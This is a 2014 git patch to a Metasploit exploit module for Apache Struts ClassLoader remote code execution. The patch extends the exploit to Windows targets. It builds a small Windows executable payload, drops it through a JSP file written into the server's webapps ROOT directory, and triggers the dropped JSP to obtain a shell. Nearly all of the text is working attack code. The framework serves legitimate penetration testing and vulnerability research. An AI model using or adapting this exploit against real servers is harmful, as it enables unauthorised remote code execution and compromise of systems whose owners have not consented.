From 373eb3dda045fa045c0fa3ccafed62dffccb98fb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Sep 2014 18:00:16 -0500
Subject: [PATCH] Make struts_code_exec_classloader to work on windows

---
 .../http/struts_code_exec_classloader.rb      | 33 +++++++++++++++----
 1 file changed, 27 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 344061f9e5..68c3eee133 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -150,6 +150,8 @@ class Metasploit3 < Msf::Exploit::Remote
         output << l
       elsif l =~ /<%/
         next
+      elsif l=~ /%>/
+        next
       elsif l.chomp.empty?
         next
       else
@@ -163,10 +165,18 @@ class Metasploit3 < Msf::Exploit::Remote
     if target['Arch'] == ARCH_JAVA
       jsp = fix(payload.encoded)
     else
-      payload_exe = generate_payload_exe
+      if target['Platform'] == 'win'
+        payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
+      else
+        payload_exe = generate_payload_exe
+      end
       payload_file = rand_text_alphanumeric(4 + rand(4))
       jsp = jsp_dropper(payload_file, payload_exe)
-      register_files_for_cleanup(payload_file)
+      if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+        register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
+      else
+        register_files_for_cleanup(payload_file)
+      end
     end
 
     jsp
@@ -193,12 +203,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Check if the log file exists and has been flushed
 
-    if check_log_file(normalize_uri(target_uri.to_s))
-      register_files_for_cleanup(@jsp_file)
-    else
+    unless check_log_file(normalize_uri(target_uri.to_s))
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
     end
 
+    if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+      register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
+    else
+      register_files_for_cleanup(@jsp_file)
+    end
+
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
     jsp = create_jsp
@@ -213,7 +227,9 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Check log file... enjoy shell!
-    check_log_file(random_request)
+    unless target['Arch'] == ARCH_JAVA
+      check_log_file(random_request)
+    end
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
@@ -223,6 +239,11 @@ class Metasploit3 < Msf::Exploit::Remote
         :file_date_format => ''
     }
     modify_class_loader(properties)
+
+    if target['Arch'] == ARCH_JAVA
+      send_request_cgi({ 'uri'     => normalize_uri("/", @jsp_file) })
+    end
+
   end
 
 end